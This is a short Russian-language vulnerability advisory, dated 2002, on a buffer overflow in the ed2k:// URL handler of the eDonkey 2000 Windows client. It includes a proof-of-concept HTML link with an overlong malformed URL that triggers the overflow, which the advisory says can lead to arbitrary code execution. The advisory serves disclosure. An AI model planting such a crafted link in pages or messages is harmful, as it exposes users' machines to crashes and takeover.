Переполнение буфера в eDonkey 2000

Дата публикации:
10.06.2002
Всего просмотров:
777
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: eDonkey - программа для обмена файлами между пользователями.

Клиент eDonkey 2000 для windows включает обработчик ed2k:// URL. Этот обработчик позволяет загружать файлы через MSIE или других браузеров. Этот обработчик уязвим к переполнению буфера при разборе некорректно сконструированного URL:

<A
href="ed2k://|file|QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQBBBBAAA|1|11111111111111111111111111111111
|">Ed2k Buffer Overflow</A>
Уязвимость может использоваться для выполнения произвольного кода на системе жертвы. Уязвимость обнаружена в eDonkey 2000 Client 35.16.59-60 Windows

Ссылки: eDonkey 2000 ed2k: URL Buffer Overflow
или введите имя

CAPTCHA